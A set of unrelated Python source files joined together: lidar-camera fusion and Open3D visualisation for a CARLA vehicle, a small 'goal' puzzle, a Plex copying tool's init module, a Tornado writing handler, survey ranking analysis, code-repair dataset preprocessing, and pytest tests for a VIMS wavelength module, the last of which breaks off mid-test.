def o3d_pointcloud_encode(raw_data, point_cloud):
"""
Encode the raw point cloud to Open3d PointCloud object.
Args:
-raw_data (np.ndarray): Raw lidar points (N, (x, y, z, i)) obtained from lidar sensor.
-point_cloud (o3d.PointCloud): Open3d PointCloud.
"""
# Isolate the intensity and compute a color for it
intensity = raw_data[:, -1]
intensity_col = 1.0 - np.log(intensity) / np.log(np.exp(-0.004 * 100))
int_color = np.c_[
np.interp(intensity_col, VID_RANGE, VIRIDIS[:, 0]),
np.interp(intensity_col, VID_RANGE, VIRIDIS[:, 1]),
np.interp(intensity_col, VID_RANGE, VIRIDIS[:, 2])]
# Isolate the 3D data
points = raw_data[:, :-1]
# We're negating the y to correclty visualize a world that matches
# what we see in Unreal since Open3D uses a right-handed coordinate system
points[:, :1] = -points[:, :1]
point_cloud.points = o3d.utility.Vector3dVector(points)
point_cloud.colors = o3d.utility.Vector3dVector(int_color)
def o3d_visualizer_init(actor_id):
"""
Initialize the visualizer.
Args:
-actor_id (int): Vehicle's id.
Returns:
-vis (o3d.visualizer): Initialize Open3d visualizer.
"""
vis = o3d.visualization.Visualizer()
vis.create_window(window_name=str(actor_id),
width=480,
height=320,
left=480,
top=270)
vis.get_render_option().background_color = [0.05, 0.05, 0.05]
vis.get_render_option().point_size = 1
vis.get_render_option().show_coordinate_frame = True
return vis
def o3d_visualizer_show(vis, count, point_cloud, objects):
"""
Visualize the point cloud at runtime.
Args:
-vis (o3d.Visualizer): Visualization interface.
-count (int): current step since simulation started.
-point_cloud (o3d.PointCLoud): Open3d point clouds.
-objects (dict): The dictionary containing objects.
"""
if count == 2:
vis.add_geometry(point_cloud)
vis.update_geometry(point_cloud)
for key, object_list in objects.items():
# we only draw vehicles for now
if key != 'vehicles':
continue
for object_ in object_list:
aabb = object_.o3d_bbx
vis.add_geometry(aabb)
vis.poll_events()
vis.update_renderer()
# # This can fix Open3D jittering issues:
time.sleep(0.001)
for key, object_list in objects.items():
if key != 'vehicles':
continue
for object_ in object_list:
aabb = object_.o3d_bbx
vis.remove_geometry(aabb)
def o3d_camera_lidar_fusion(objects, yolo_bbx, lidar_3d, projected_lidar, lidar_sensor):
"""
Utilize the 3D lidar points to extend the 2D bounding box from camera to 3D bounding box under world coordinates.
Args:
-objects (dict): The dictionary contains all object detection result.
-yolo_bbx (torch.Tensor): Object detection bounding box at current photo from yolov5,
shape:(n, [x1, y1, x2, y2, label]).
-lidar_3d (np.ndarray): Raw 3D lidar points in lidar coordinate system.
-projected_lidar (np.ndarray): 3D lidar points projected to the camera space.
-lidar_sensor (carla.Sensor): The lidar sensor.
Returns:
-objects (dict): The update object dictionary that contains 3d bounding boxes.
"""
# convert torch tensor to numpy array first
if yolo_bbx.is_cuda:
yolo_bbx = yolo_bbx.cpu().detach().numpy()
else:
yolo_bbx = yolo_bbx.detach().numpy()
for i in range(yolo_bbx.shape[0]):
detection = yolo_bbx[i]
# 2d bbx coordinates
x1, y1, x2, y2 = int(detection[0]), int(detection[1]), int(detection[2]), int(detection[3])
label = int(detection[5])
# choose the lidar points in the 2d yolo bounding box
points_in_bbx = \
(projected_lidar[:, 0] > x1) & (projected_lidar[:, 0] < x2) & \
(projected_lidar[:, 1] > y1) & (projected_lidar[:, 1] < y2) & \
(projected_lidar[:, 2] > 0.0)
# ignore intensity channel
select_points = lidar_3d[points_in_bbx][:, :-1]
if select_points.shape[0] == 0:
continue
# filter out the outlier
x_common = mode(np.array(np.abs(select_points[:, 0]), dtype=np.int), axis=0)[0][0]
y_common = mode(np.array(np.abs(select_points[:, 1]), dtype=np.int), axis=0)[0][0]
points_inlier = (np.abs(select_points[:, 0]) > x_common - 3) & (np.abs(select_points[:, 0]) < x_common + 3) & \
(np.abs(select_points[:, 1]) > y_common - 3) & (np.abs(select_points[:, 1]) < y_common + 3)
select_points = select_points[points_inlier]
if select_points.shape[0] < 2:
continue
# to visualize 3d lidar points in o3d visualizer, we need to revert the x coordinates
select_points[:, :1] = -select_points[:, :1]
# create o3d.PointCloud object
o3d_pointcloud = o3d.geometry.PointCloud()
o3d_pointcloud.points = o3d.utility.Vector3dVector(select_points)
# add o3d bounding box
aabb = o3d_pointcloud.get_axis_aligned_bounding_box()
aabb.color = (0, 1, 0)
# get the eight corner of the bounding boxes.
corner = np.asarray(aabb.get_box_points())
# covert back to unreal coordinate
corner[:, :1] = -corner[:, :1]
corner = corner.transpose()
# extend (3, 8) to (4, 8) for homogenous transformation
corner = np.r_[corner, [np.ones(corner.shape[1])]]
# project to world reference
corner = st.sensor_to_world(corner, lidar_sensor.get_transform())
corner = corner.transpose()[:, :3]
if is_vehicle_cococlass(label):
obstacle_vehicle = ObstacleVehicle(corner, aabb)
if 'vehicles' in objects:
objects['vehicles'].append(obstacle_vehicle)
else:
objects['vehicles'] = [obstacle_vehicle]
# we regard or other obstacle rather than vehicle as static class
else:
static_obstacle = StaticObstacle(corner, aabb)
if 'static' in objects:
objects['static'].append(static_obstacle)
else:
objects['static'] = [static_obstacle]
return objects
|
#!/usr/bin/env python3
# encoding: utf-8
# based on someone elses soln
class Goal(int):
def __call__(self, x=None):
if x is None:
return type(self)(self+1)
return f'g{"o"*self}{x}'
g = Goal()
def main():
"""self-test"""
if not __debug__:
raise AssertionError('debug mode is off, so no tests will be run')
assert g()()()('al') == 'goooal'
assert g()()('al') == 'gooal'
assert g()('al') == 'goal'
assert g('al') == 'gal'
assert g('houl') == 'ghoul'
if __name__ == '__main__':
main()
|
"""
Plexiglas is a script which helps you to copy your content from a Plex server to any other storage.
I'm using it especially for copying movies and tv-shows from my main server to a "travel" instance, which is set up
on my external HDD (WD My Passport Wireless Pro).
"""
__version__ = '_CI_SET_VERSION_'
import logging
try:
import keyring # noqa: F401
from keyring.core import set_keyring
except ImportError:
import keyring_stub as keyring # noqa: F401
def set_keyring(x):
pass
log = logging.getLogger('plexiglas')
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from base import BaseHandler
import time
import sys
sys.path.append('..')
from models.user import User
from models.card import Card
from models.story import Story
from models.article import Article
class WriteHandler(BaseHandler):
def get(self):
uname=self.get_current_user()
user=User.get_user_by_name(uname)
if len(user) > 0:
cid = self.get_argument("cid", None)
sid = self.get_argument("sid", None)
Class = "free"
if cid is not None:
Class="card"
elif sid is not None:
Class="story"
card=Card.get_by_cid(cid)
story=Story.get_by_sid(sid)
self.render("write.html",user=user,card=card,story=story,Class=Class)
else:
self.redirect("/login")
def post(self):
uid = self.get_argument("uid",10000000)
Class=self.get_argument("Class",None)
kid = self.get_argument("kid",None)
title = self.get_argument("title","无题")
content=self.get_argument("content",None)
label = self.get_argument("label","")
date = time.strftime("%Y-%m-%d %H:%M:%S",time.localtime())
if content is not None:
Article.add_one_article(Class,uid,kid,kid,"1",label,title,content,"none",date)
if Class=="story":
User.add_one_nstory(uid)
if Class=="card":
User.add_one_ncard(uid)
if Class=="free":
User.add_one_nfree(uid)
self.redirect("/"+Class)
elif Class == "story":
self.redirect("/write?sid="+str(kid))
elif Class=="card":
self.redirect("/write?cid="+str(kid))
else:
self.redirect("/write")
|
""" Analyze cleaned survey data
See anonymize_data.py for structure of data frame.
Run tests with::
pytest test_analyze_data.py
"""
from __future__ import division
import numpy as np
def ana_question(df, q_root, row_weights=None):
row_weights = 1 if row_weights is None else np.array(row_weights)[:, None]
yes_qs = [q for q in df.columns
if q.startswith(q_root + '-ranks-yes')]
maybe_qs = [q for q in df.columns
if q.startswith(q_root + '-ranks-maybe')]
yes_rescaled = ((ana_part(df[yes_qs]) + 1).fillna(0).as_matrix() *
row_weights)
maybe_rescaled = ana_part(df[maybe_qs]).fillna(0).as_matrix() * row_weights
values = (yes_rescaled + maybe_rescaled).sum(axis=0)
names = [q.split('-')[-1] for q in yes_qs]
return dict(zip(names, values))
def get_categories(df):
return [q for q in df.columns if q.startswith('category')]
def category_weights(df):
categories = get_categories(df)
weights = ana_part(df[categories]).copy().fillna(0)
cat_names = [q.split('-')[-1] for q in categories]
weights.columns = cat_names
return weights
def ana_part(cols):
n = len(cols.columns)
return (n - (cols - 1)) / n
def process_data(df):
categories = get_categories(df)
weights = category_weights(df)
cat_names = weights.columns
cat_rank_mean = dict(zip(cat_names, df[categories].mean()))
cat_scores = {}
w_cat_scores = {}
for cat in cat_names:
cat_scores[cat] = ana_question(df, cat)
w_cat_scores[cat] = ana_question(df, cat, weights[cat])
return cat_rank_mean, cat_scores, w_cat_scores
def main():
from pprint import pprint
import pandas as pd
df = pd.read_csv('thw_survey.csv')
cat_rank_mean, cat_scores, w_cat_scores = process_data(df)
print('Mean rank of categories')
pprint(cat_rank_mean)
print('Composite ranking score within categories')
pprint(cat_scores)
print('Weighted composite ranking score within categories')
pprint(w_cat_scores)
if __name__ == '__main__':
main()
|
from datetime import datetime
from sklearn.model_selection import train_test_split
from Symbolic.AbstractConverter import AbstractConverter
from Symbolic.CigarSrcTrgt import getUnicodeStrs, getUnicodeDicts
from Symbolic.DataStructs import Code
from Common.utils import *
import pandas as pd
import edlib
from timeit import default_timer as timer
from Common import ConfigFile as CF, utils
def getAlignDict(srcAbs, trgtAbs):
dictAbs_Unicode, dictUnicode_Abs = getUnicodeDicts(srcAbs, trgtAbs)
srcAbsUni = getUnicodeStrs(dictAbs_Unicode, srcAbs)
trgtAbsUni = getUnicodeStrs(dictAbs_Unicode, trgtAbs)
if len(trgtAbsUni) == 0: # If the target Abs is empty (edlib crashes, hence handle separately)
if len(srcAbsUni) == 0: # And if the source Abs is empty as well
cigar = '' # Nothing to do
else:
cigar = str(len(srcAbsUni)) + 'D' # Else, delete all source Abs
else:
cigar = edlib.align(trgtAbsUni, srcAbsUni, task='path')
return cigar
def getStats(filename):
df = pd.read_csv(filename)
diffLen = []
exceptions = []
moreThanOne = 0
srcAbstractionTime = 0
trgtAbstractionTime = 0
for i, row in df.iterrows():
if i < 888:
continue
if i % 100 == 0:
print('At {}/{}'.format(i, df.shape[0]))
try:
sourceText = row['sourceText']
sourceText = sourceText.split("\n")
trgtText = row['targetText']
trgtText = trgtText.split('\n')
start = timer()
sourceCode = Code(sourceText)
abstractConverter = AbstractConverter(sourceCode, inferTypes=False, debug=False)
srcTokenizedCode, srcAbstractCode, srcSymbTable = abstractConverter.getAbstractionAntlr()
srcAbstractionTime += timer() - start
start = timer()
trgtCode = Code(trgtText)
abstractConverter = AbstractConverter(trgtCode, inferTypes=False, debug=False)
trgtTokenizedCode, trgtAbstractCode, trgtSymbTable = abstractConverter.getAbstractionAntlr()
trgtAbstractionTime += timer() - start
if len(srcAbstractCode) != len(trgtAbstractCode):
diffLen.append(i)
differentLines = []
for j in range(min(len(srcAbstractCode), len(trgtAbstractCode))):
srcAbsLine = srcAbstractCode[j]
trgtAbsLine = trgtAbstractCode[j]
alignDict = getAlignDict(srcAbsLine, trgtAbsLine)
if isinstance(alignDict, dict) and alignDict['editDistance'] > 0:
differentLines.append(j + 1)
if len(differentLines) > 1:
moreThanOne += 1
except Exception as e:
# traceback.print_stack()
exceptions.append((i, str(e)))
# break
for ex in exceptions:
print(ex)
print('More than one line differs ', moreThanOne)
print("Abstraction times: src :{} , trgt: {}".format(srcAbstractionTime, trgtAbstractionTime))
def splitMultiLineData(df):
# df = pd.read_csv(filename)
diffLen = []
exceptions = []
moreThanOne = 0
srcAbstractionTime = 0
trgtAbstractionTime = 0
# outDf = df.copy()
outDf = pd.DataFrame(columns=df.columns)
outDf["sourceError"] = ""
outDf["sourceLineTypeAbs"] = ""
outDf["targetLineTypeAbs"] = ""
moreThanOne = 0
for i, row in df.iterrows():
# if i < 64:
# continue
if i % 100 == 0:
print('At {}/{}'.format(i, df.shape[0]))
try:
sourceText, trgtText = utils.readSrcTrgtText(row)
start = timer()
sourceCode = Code(sourceText)
abstractConverter = AbstractConverter(sourceCode, inferTypes=False, debug=False)
srcTokenizedCode, srcAbstractCode, srcSymbTable = abstractConverter.getAbstractionAntlr()
abstractConverter = AbstractConverter(sourceCode, inferTypes=True, debug=False)
srcTypeTokenizedCode, srcTypeAbstractCode, srcTypeSymbTable = abstractConverter.getAbstractionAntlr()
srcAbstractionTime += timer() - start
start = timer()
trgtCode = Code(trgtText)
abstractConverter = AbstractConverter(trgtCode, inferTypes=False, debug=False)
trgtTokenizedCode, trgtAbstractCode, trgtSymbTable = abstractConverter.getAbstractionAntlr()
abstractConverter = AbstractConverter(trgtCode, inferTypes=True, debug=False)
trgtTypeTokenizedCode, trgtTypeAbstractCode, trgtTypeSymbTable = abstractConverter.getAbstractionAntlr()
trgtAbstractionTime += timer() - start
if len(srcAbstractCode) != len(trgtAbstractCode):
diffLen.append(i)
differentLines = []
for j in range(min(len(srcAbstractCode), len(trgtAbstractCode))):
srcAbsLine = srcAbstractCode[j]
trgtAbsLine = trgtAbstractCode[j]
alignDict = getAlignDict(srcAbsLine, trgtAbsLine)
# print('align', type(alignDict))
if isinstance(alignDict, dict) and alignDict['editDistance'] > 0:
differentLines.append(j + 1)
tmpSrc = deepcopy(trgtText)
tmpSrcAbs = deepcopy(trgtAbstractCode)
tmpSrc[j] = sourceText[j]
tmpSrcAbs[j] = srcAbstractCode[j]
newRow = row.copy()
newRow['sourceText'] = joinList(tmpSrc)
newRow['targetText'] = row['targetText']
newRow['sourceAbs'] = joinLL(tmpSrcAbs)
newRow['targetAbs'] = joinLL(trgtAbstractCode)
newRow['sourceLineText'] = sourceText[j]
newRow['targetLineText'] = trgtText[j]
newRow['sourceLineAbs'] = joinList(srcAbstractCode[j], joinStr=' ')
newRow['targetLineAbs'] = joinList(trgtAbstractCode[j], joinStr=' ')
newRow['sourceLineTypeAbs'] = joinList(srcTypeAbstractCode[j], joinStr=' ')
newRow['targetLineTypeAbs'] = joinList(trgtTypeAbstractCode[j], joinStr=' ')
newRow['lineNums_Abs'] = str(j + 1)
tmpCode = Code(tmpSrc)
errInfo = tmpCode.getErrorInfo()
newRow['sourceError'] = str(errInfo)
if errInfo.lineNo != -1:
outDf = outDf.append(newRow)
# print(newRow)
del newRow
if len(differentLines) > 1:
moreThanOne += 1
except Exception as e:
print('exception ', str(e))
exceptions.append((i, str(e)))
for ex in exceptions:
print(ex)
print(len(exceptions))
print(moreThanOne)
print("Abstraction times: src :{} , trgt: {}".format(srcAbstractionTime, trgtAbstractionTime))
print(outDf.shape)
return outDf
def generateFullData(single=False):
singleFile = './data/Python CEs/singleL_srcTrgtPairs.csv'
multiFile = './data/Python CEs/multL_srcTrgtPairs.csv'
zeroFile = './data/Python CEs/zeroDiff_srcTrgtPairs.csv'
df = pd.read_csv(singleFile)
outDf1 = splitMultiLineData(df)
print("multi")
df = pd.read_csv(multiFile)
outDf2 = splitMultiLineData(df)
print("zero")
df = pd.read_csv(zeroFile)
outDf3 = splitMultiLineData(df)
if single:
outDf = outDf1
else:
outDf = pd.concat([outDf1, outDf2, outDf3], ignore_index=True)
outDf.to_csv(
'/'.join(singleFile.split('/')[:-1]) + "/generatedSL" + str(datetime.now().strftime("%H_%M_%S")) + ".csv")
def createEmptyDF(df):
outDf = pd.DataFrame(columns=df.columns)
outDf["sourceError"] = ""
outDf["sourceLineTypeAbs"] = ""
outDf["targetLineTypeAbs"] = ""
return outDf
def prepareAndAddRow(row, df, lineNos, sourceCode, sourceText, srcAbstractCode, srcTypeAbstractCode,
trgtText, trgtAbstractCode, trgtTypeAbstractCode):
newRow = row.copy()
if len(lineNos) == 0:
lineNo = -1
else:
lineNo = int(lineNos[0])
newRow['sourceAbs'] = joinLL(srcAbstractCode)
newRow['targetAbs'] = joinLL(trgtAbstractCode)
if lineNo > 0:
newRow['sourceLineText'] = '' if lineNo > len(sourceText) else sourceText[
lineNo - 1] # since source/trgt might be missing a line
newRow['targetLineText'] = '' if lineNo > len(trgtText) else trgtText[lineNo - 1]
newRow['sourceLineAbs'] = '' if lineNo > len(srcAbstractCode) \
else joinList(srcAbstractCode[lineNo - 1], joinStr=' ')
newRow['targetLineAbs'] = '' if lineNo > len(trgtAbstractCode) \
else joinList(trgtAbstractCode[lineNo - 1], joinStr=' ')
newRow['sourceLineTypeAbs'] = '' if lineNo > len(srcTypeAbstractCode) \
else joinList(srcTypeAbstractCode[lineNo - 1], joinStr=' ')
newRow['targetLineTypeAbs'] = '' if lineNo > len(trgtTypeAbstractCode) \
else joinList(trgtTypeAbstractCode[lineNo - 1], joinStr=' ')
else:
print("her", lineNo, end=" ")
pass
if len(lineNos) > 1:
lineNos = list(map(str, lineNos))
lineNos = str("\n".join(lineNos))
elif len(lineNos) == 1:
lineNos = lineNos[0]
else:
lineNos = -1
newRow['lineNums_Abs'] = str(lineNos)
errInfo = sourceCode.getErrorInfo()
newRow['sourceError'] = str(errInfo)
if errInfo.lineNo != -1:
df = df.append(newRow)
del newRow
return df
def reorganizeData(new=False):
if new:
singleFile = '../../data/dataset-2/singleL.csv'
multiFile = '../../data/dataset-2/multL.csv'
zeroFile = '../../data/dataset-2/zeroL.csv'
else:
singleFile = '../../data/Python CEs/singleL_srcTrgtPairs.csv'
multiFile = '../../data/Python CEs/multL_srcTrgtPairs.csv'
zeroFile = '../../data/Python CEs/zeroDiff_srcTrgtPairs.csv'
# zeroFile = './data/Python CEs/newZeroLine.csv'
singleInput = pd.read_csv(singleFile)
multiInput = pd.read_csv(multiFile)
zeroInput = pd.read_csv(zeroFile)
# singleOutput = pd.read_csv('./data/Python CEs/newSingleLine.csv')
# multiOutput = pd.read_csv('./data/Python CEs/newMultiLine.csv')
# zeroOutput = pd.read_csv('./data/Python CEs/newZeroLine.csv')
singleOutput = createEmptyDF(singleInput)
multiOutput = createEmptyDF(multiInput)
zeroOutput = createEmptyDF(zeroInput)
diffLen = []
exceptions = []
diffLen, excpetions, multiOutput, singleOutput, zeroOutput = \
seperateDatasets(diffLen, exceptions, multiOutput, singleInput, singleOutput,
zeroOutput)
diffLen, excpetions, multiOutput, singleOutput, zeroOutput = \
seperateDatasets(diffLen, exceptions, multiOutput, multiInput, singleOutput,
zeroOutput)
diffLen, excpetions, multiOutput, singleOutput, zeroOutput = \
seperateDatasets(diffLen, exceptions, multiOutput, zeroInput, singleOutput,
zeroOutput)
for ex in exceptions:
print(ex)
print(diffLen)
singleOutput.to_csv('/'.join(singleFile.split('/')[:-1]) + "/newSingleLine.csv")
multiOutput.to_csv('/'.join(multiFile.split('/')[:-1]) + "/newMultiLine.csv")
zeroOutput.to_csv('/'.join(zeroFile.split('/')[:-1]) + "/newZeroLine.csv")
def seperateDatasets(diffLen, exceptions, multiOutput, singleInput, singleOutput, zeroOutput):
for i, row in singleInput.iterrows():
if i % 100 == 0:
print('At {}/{}'.format(i, singleInput.shape[0]))
try:
sourceText, trgtText = utils.readSrcTrgtText(row)
start = timer()
sourceCode = Code(sourceText)
abstractConverter = AbstractConverter(sourceCode, inferTypes=False, debug=False)
srcTokenizedCode, srcAbstractCode, srcSymbTable = abstractConverter.getAbstractionAntlr()
abstractConverter = AbstractConverter(sourceCode, inferTypes=True, debug=False)
srcTypeTokenizedCode, srcTypeAbstractCode, srcTypeSymbTable = abstractConverter.getAbstractionAntlr()
start = timer()
trgtCode = Code(trgtText)
abstractConverter = AbstractConverter(trgtCode, inferTypes=False, debug=False)
trgtTokenizedCode, trgtAbstractCode, trgtSymbTable = abstractConverter.getAbstractionAntlr()
abstractConverter = AbstractConverter(trgtCode, inferTypes=True, debug=False)
trgtTypeTokenizedCode, trgtTypeAbstractCode, trgtTypeSymbTable = abstractConverter.getAbstractionAntlr()
if len(srcAbstractCode) != len(trgtAbstractCode):
diffLen.append(i)
differentLines = []
minLen = min(len(srcAbstractCode), len(trgtAbstractCode))
for j in range(minLen):
srcAbsLine = srcAbstractCode[j]
trgtAbsLine = trgtAbstractCode[j]
alignDict = getAlignDict(srcAbsLine, trgtAbsLine)
# print('align', type(alignDict))
if isinstance(alignDict, dict) and alignDict['editDistance'] > 0:
differentLines.append(j + 1)
elif (len(srcAbsLine) == 0 and len(trgtAbsLine) != 0) or (len(srcAbsLine) != 0 and len(trgtAbsLine) == 0):
differentLines.append(j + 1)
for j in range(abs(len(srcAbstractCode) - len(trgtAbstractCode))):
l = minLen + j
differentLines.append(l + 1)
if len(differentLines) == 0:
# zeroDiff
zeroOutput = prepareAndAddRow(row, zeroOutput, differentLines, sourceCode, sourceText,
srcAbstractCode,
srcTypeAbstractCode, trgtText, trgtAbstractCode, trgtTypeAbstractCode)
elif len(differentLines) == 1:
# singleDiff
singleOutput = prepareAndAddRow(row, singleOutput, differentLines, sourceCode, sourceText,
srcAbstractCode,
srcTypeAbstractCode, trgtText, trgtAbstractCode, trgtTypeAbstractCode)
else:
multiOutput = prepareAndAddRow(row, multiOutput, differentLines, sourceCode, sourceText,
srcAbstractCode,
srcTypeAbstractCode, trgtText, trgtAbstractCode, trgtTypeAbstractCode)
except Exception as e:
print('exception ', str(e))
exceptions.append((i, str(e)))
return diffLen, exceptions, multiOutput, singleOutput, zeroOutput
def splitData(filename):
df = pd.read_csv(filename)
train, test = train_test_split(df, test_size=0.2, random_state=42, shuffle=True)
train.to_csv("/".join(filename.split('/')[:-1]) + "/train" + filename.split("/")[-1])
test.to_csv("/".join(filename.split('/')[:-1]) + "/test" + filename.split("/")[-1])
def mergeCSVs(csv1, csv2, out_file):
df1 = pd.read_csv(csv1)
df2 = pd.read_csv(csv2)
frames = [df1, df2]
outDf = pd.concat(frames)
outDf.to_csv(out_file, index=False)
if __name__ == '__main__':
# getStats(filename='./data/Python CEs/zeroDiff_srcTrgtPairs.csv')
# splitMultiLineData(filename='./data/Python CEs/singleL_srcTrgtPairs.csv')
# generateFullData()
# splitData(CF.dataPath + '/newSingleLine.csv')
# reorganizeData(new=True)
mergeCSVs(CF.dataPath + "/newSingleLine.csv", CF.newDataPath + "/newSingleLine.csv", CF.dataPath + "/mergedNewSingleLine.csv")
# mergeCSVs(CF.fnameSingleL_Test_new, CF.fnameSingleL_Test, CF.dataPath + "/mergedTest.csv")
|
"""Test VIMS wavelength module."""
from pathlib import Path
import numpy as np
from numpy.testing import assert_array_almost_equal as assert_array
from pyvims import QUB
from pyvims.vars import ROOT_DATA
from pyvims.wvlns import (BAD_IR_PIXELS, CHANNELS, FWHM, SHIFT,
VIMS_IR, VIMS_VIS, WLNS, YEARS,
bad_ir_pixels, ir_multiplexer, ir_hot_pixels,
is_hot_pixel, median_spectrum, moving_median,
sample_line_axes)
from pytest import approx, raises
DATA = Path(__file__).parent / 'data'
def test_vims_csv():
"""Test CSV global variables."""
assert len(CHANNELS) == len(WLNS) == len(FWHM) == 352
assert CHANNELS[0] == 1
assert CHANNELS[-1] == 352
assert WLNS[0] == .350540
assert WLNS[-1] == 5.1225
assert FWHM[0] == .007368
assert FWHM[-1] == .016
assert len(YEARS) == len(SHIFT) == 58
assert YEARS[0] == 1999.6
assert YEARS[-1] == 2017.8
assert SHIFT[0] == -25.8
assert SHIFT[-1] == 9.8
def test_vims_ir():
"""Test VIMS IR wavelengths."""
# Standard wavelengths
wvlns = VIMS_IR()
assert len(wvlns) == 256
assert wvlns[0] == .884210
assert wvlns[-1] == 5.122500
# Full-width at half maximum value
fwhms = VIMS_IR(fwhm=True)
assert len(fwhms) == 256
assert fwhms[0] == .012878
assert fwhms[-1] == .016
# Wavenumber (cm-1)
wvnb = VIMS_IR(sigma=True)
assert len(wvnb) == 256
assert wvnb[0] == approx(11309.53, abs=1e-2)
assert wvnb[-1] == approx(1952.17, abs=1e-2)
# Single band
assert VIMS_IR(band=97) == .884210
assert VIMS_IR(band=97, fwhm=True) == .012878
assert VIMS_IR(band=97, sigma=True) == approx(11309.53, abs=1e-2)
assert VIMS_IR(band=97, fwhm=True, sigma=True) == approx(164.72, abs=1e-2)
# Selected bands array
assert_array(VIMS_IR(band=[97, 352]), [.884210, 5.122500])
assert_array(VIMS_IR(band=[97, 352], fwhm=True), [.012878, .016])
# Time offset
assert VIMS_IR(band=97, year=2002) == approx(.884210, abs=1e-6)
assert VIMS_IR(band=97, year=2005) == approx(.884210, abs=1e-6)
assert VIMS_IR(band=97, year=2001.5) == approx(.885410, abs=1e-6) # +.0012
assert VIMS_IR(band=97, year=2011) == approx(.890210, abs=1e-6) # +.006
# Time offset on all IR bands
wvlns_2011 = VIMS_IR(year=2011)
assert len(wvlns_2011) == 256
assert wvlns_2011[0] == approx(.890210, abs=1e-6)
assert wvlns_2011[-1] == approx(5.128500, abs=1e-6)
# No change in FWHM with time
assert VIMS_IR(band=97, year=2001.5, fwhm=True) == .012878
# Outside IR band range
assert np.isnan(VIMS_IR(band=0))
assert np.isnan(VIMS_IR(band=96, fwhm=True))
assert np.isnan(VIMS_IR(band=353, sigma=True))
def test_vims_vis():
"""Test VIMS VIS wavelengths."""
# Standard wavelengths
wvlns = VIMS_VIS()
assert len(wvlns) == 96
assert wvlns[0] == .350540
assert wvlns[-1] == 1.045980
# Full-width at half maximum value
fwhms = VIMS_VIS(fwhm=True)
assert len(fwhms) == 96
assert fwhms[0] == .007368
assert fwhms[-1] == .012480
# Wavenumber (cm-1)
wvnb = VIMS_VIS(sigma=True)
assert len(wvnb) == 96
assert wvnb[0] == approx(28527.41, abs=1e-2)
assert wvnb[-1] == approx(9560.41, abs=1e-2)
# Single band
assert VIMS_VIS(band=96) == 1.045980
assert VIMS_VIS(band=96, fwhm=True) == .012480
assert VIMS_VIS(band=96, sigma=True) == approx(9560.41, abs=1e-2)
assert VIMS_VIS(band=96, fwhm=True, sigma=True) == approx(114.07, abs=1e-2)
# Selected bands array
assert_array(VIMS_VIS(band=[1, 96]), [.350540, 1.045980])
assert_array(VIMS_VIS(band=[1, 96], fwhm=True), [.007368, .012480])
# Time offset
with raises(ValueError):
_ = VIMS_VIS(band=97, year=2002)
with raises(ValueError):
_ = VIMS_VIS(year=2011)
# Outside IR band range
assert np.isnan(VIMS_VIS(band=0))
assert np.isnan(VIMS_VIS(band=97, fwhm=True))
assert np.isnan(VIMS_VIS(band=353, sigma=True))
def test_bad_ir_pixels():
"""Test bad IR pixels list."""
csv = np.loadtxt(ROOT_DATA / 'wvlns_std.csv',
delimiter=',', usecols=(0, 1, 2, 3),
dtype=str, skiprows=98)
# Extract bad pixels
wvlns = np.transpose([
(int(channel), float(wvln) - .5 * float(fwhm), float(fwhm))
for channel, wvln, fwhm, comment in csv
if comment
])
# Group bad pixels
news = [True] + list((wvlns[0, 1:] - wvlns[0, :-1]) > 1.5)
bads = []
for i, new in enumerate(news):
if new:
bads.append(list(wvlns[1:, i]))
else:
bads[-1][1] += wvlns[2, i]
assert_array(BAD_IR_PIXELS, bads)
coll = bad_ir_pixels()
assert len(coll.get_paths()) == len(bads)
def test_moving_median():
"""Test moving median filter."""
a = [1, 2, 3, 4, 5]
assert_array(moving_median(a, width=1), a)
assert_array(moving_median(a, width=3),
[1.5, 2, 3, 4, 4.5])
assert_array(moving_median(a, width=5),
[2, 2.5, 3, 3.5, 4])
assert_array(moving_median(a, width=2),
[1.5, 2.5, 3.5, 4.5, 5])
assert_array(moving_median(a, width=4),
[2, 2.5, 3.5, 4, 4.5])
def test_is_hot_pixel():
"""Test hot pixel detector."""
# Create random signal
signal = np.random.default_rng().integers(20, size=100)
# Add hot pixels
signal[10::20] = 50
signal[10::30] = 150
hot_pix = is_hot_pixel(signal)
assert len(hot_pix) == 100
assert 3 <= sum(hot_pix) < 6
assert all(hot_pix[10::30])
hot_pix = is_hot_pixel(signal, tol=1.5, frac=90)
assert len(hot_pix) == 100
assert 6 <= sum(hot_pix) < 12
assert all(hot_pix[10::20])
def test_sample_line_axes():
"""Test locatation sample and line axes."""
# 2D case
assert sample_line_axes((64, 352)) == (0, )
assert sample_line_axes((256, 32)) == (1, )
# 3D case
assert sample_line_axes((32, 64, 352)) == (0, 1)
assert sample_line_axes((32, 352, 64)) == (0, 2)
assert sample_line_axes((352, 32, 64)) == (1, 2)
# 1D case
with raises(TypeError):
_ = sample_line_axes((352))
# No band axis
with raises(ValueError):
_ = sample_line_axes((64, 64))
def test_median_spectrum():
"""Test the median spectrum extraction."""
# 2D cases
spectra = [CHANNELS, CHANNELS]
spectrum = median_spectrum(spectra) # (2, 352)
assert spectrum.shape == (352,)
assert spectrum[0] == 1
assert spectrum[-1] == 352
spectrum = median_spectrum(np.transpose(spectra)) # (352, 2)
assert spectrum.shape == (352,)
assert spectrum[0] == 1
assert spectrum[-1] == 352
# 3D cases
spectra = [[CHANNELS, CHANNELS]]
spectrum = median_spectrum(spectra) # (1, 2, 352)
assert spectrum.shape == (352,)
assert spectrum[0] == 1
assert spectrum[-1] == 352
spectrum = median_spectrum(np.moveaxis(spectra, 1, 2)) # (1, 352, 2)
assert spectrum.shape == (352,)
assert spectrum[0] == 1
assert spectrum[-1] == 352
spectrum = median_spectrum(np.moveaxis(spectra, 2, 0)) # (352, 1, 2)
assert spectrum.shape == (352,)
assert spectrum[0] == 1
assert spectrum[-1] == 352
def test_ir_multiplexer():
"""Test spectrum split in each IR multiplexer."""
# Full spectrum
spec_1, spec_2 = ir_multiplexer(CHANNELS)
assert len(spec_1) == 128
assert len(spec_2) == 128
assert spec_1[0] == 97
assert spec_1[-1] == 351
assert spec_2[0] == 98
assert spec_2[-1] == 352
# IR spectrum only
spec_1, spec_2 = ir_multiplexer(CHANNELS[96:])
assert len(spec_1) == 128
assert len(spec_2) == 128
assert spec_1[0] == 97
assert spec_1[-1] == 351
assert spec_2[0] == 98
assert spec_2[-1] == 352
# 2D spectra
spectra = [CHANNELS, CHANNELS]
spec_1, spec_2 = ir_multiplexer(spectra)
assert len(spec_1) == 128
assert len(spec_2) == 128
assert spec_1[0] == 97
assert spec_1[-1] == 351
assert spec_2[0] == 98
assert spec_2[-1] == 352
# 3D spectra
spectra = [[CHANNELS, CHANNELS]]
spec_1, spec_2 = ir_multiplexer(spectra)
